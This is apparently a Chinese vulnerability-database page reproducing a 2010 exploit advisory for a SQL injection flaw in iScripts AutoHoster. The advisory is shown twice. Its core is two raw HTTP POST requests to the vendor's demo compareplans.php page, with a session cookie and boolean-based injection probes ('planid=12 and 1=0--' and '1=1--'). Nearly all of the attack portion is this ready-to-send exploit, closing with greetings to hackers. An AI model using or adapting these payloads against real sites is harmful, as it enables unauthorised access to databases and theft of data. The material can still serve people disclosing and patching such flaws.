iScripts AutoHoster SQL injection Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1050505 漏洞类型
发布时间 2010-07-02 更新时间 2010-07-02
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2010070018
|漏洞详情
漏洞细节尚未披露
|漏洞EXP

$-------------------------------------------------------------------------------------------------------------------
$ iScripts AutoHoster SQL injection Vulnerabilities
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download : http://www.iscripts.com/autohoster/
$ Date : 02/07/2010
$ Email : sangteamhtham@gmail.com
$****************
$Exploit:
$
$
Code:
****************
Host: www.iscripts.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.iscripts.com/autohoster/demo/compareplans.php?id=4
Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=autohoster
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=0--&domopt=H&ddomain=hcegroup.net&tld=biz

****************
Host: www.iscripts.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.iscripts.com/autohoster/demo/compareplans.php?id=4
Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=autohoster
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=1--&domopt=H&ddomain=hcegroup.net&tld=biz

$****************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$--------------------------------------------------------------------------------------------------------------------


iScripts AutoHoster.txt

$-------------------------------------------------------------------------------------------------------------------
$  iScripts AutoHoster SQL injection Vulnerabilities
$  Author   : Sangteamtham                                                                    
$  Home     : Hcegroup.net                                               
$  Download : http://www.iscripts.com/autohoster/   
$  Date     : 02/07/2010
$  Email    : sangteamhtham@gmail.com                 					           
$****************
$Exploit:
$
$ 
Code:
****************
Host: www.iscripts.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.iscripts.com/autohoster/demo/compareplans.php?id=4
Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=autohoster
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=0--&domopt=H&ddomain=hcegroup.net&tld=biz

****************
Host: www.iscripts.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.iscripts.com/autohoster/demo/compareplans.php?id=4
Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=autohoster
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=1--&domopt=H&ddomain=hcegroup.net&tld=biz

$****************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$--------------------------